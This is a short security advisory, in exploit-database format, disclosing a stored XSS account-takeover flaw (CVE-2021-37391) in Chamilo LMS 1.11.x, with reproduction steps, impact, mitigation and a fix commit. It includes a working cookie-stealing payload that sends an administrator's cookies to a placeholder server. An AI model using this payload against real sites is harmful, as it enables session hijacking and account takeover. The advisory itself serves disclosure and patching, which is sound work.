# Exploit Title: Chamilo LMS 1.11.14 - Account Takeover # Date: July 21 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://chamilo.org # Software Link: https://chamilo.org # Version: Chamilo-lms-1.11.x # Tested on: Chamilo-lms-1.11.x # CVE: CVE-2021-37391 #Publication: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities Description: A user without privileges in Chamilo LMS 1.11.x can send an invitation message to another user, e.g., the administrator, through main/social/search.php, main/inc/lib/social.lib.php and steal cookies or execute arbitrary code on the administration side via a stored XSS vulnerability via social network the send invitation feature. . CVE ID: CVE-2021-37391 CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities Affected parameter: send private message - text field Payload: <img src=x onerror=this.src=' http://yourserver/?c='+document.cookie> Steps to reproduce: 1. Navigate to the social network menu 2. Select the victim profile 3. Add the payload on the text field 4. Submit the request and wait for the payload execution *Impact:* By using this vulnerability, an unprivileged user can steal cookies from an admin account or force the administrator to create an account with admin privileges with an HTTP 302 redirect. *Mitigation*: Update the Chamilo to the latest version. *Fix*: https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8 Com os meus melhores cumprimentos, -- *Pedro Tavares* Founder and Editor-in-Chief at seguranca-informatica.pt Co-founder of CSIRT.UBI Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/> seguranca-informatica.pt | @sirpedrotavares <https://twitter.com/sirpedrotavares> | 0xSI_f33d <https://feed.seguranca-informatica.pt/>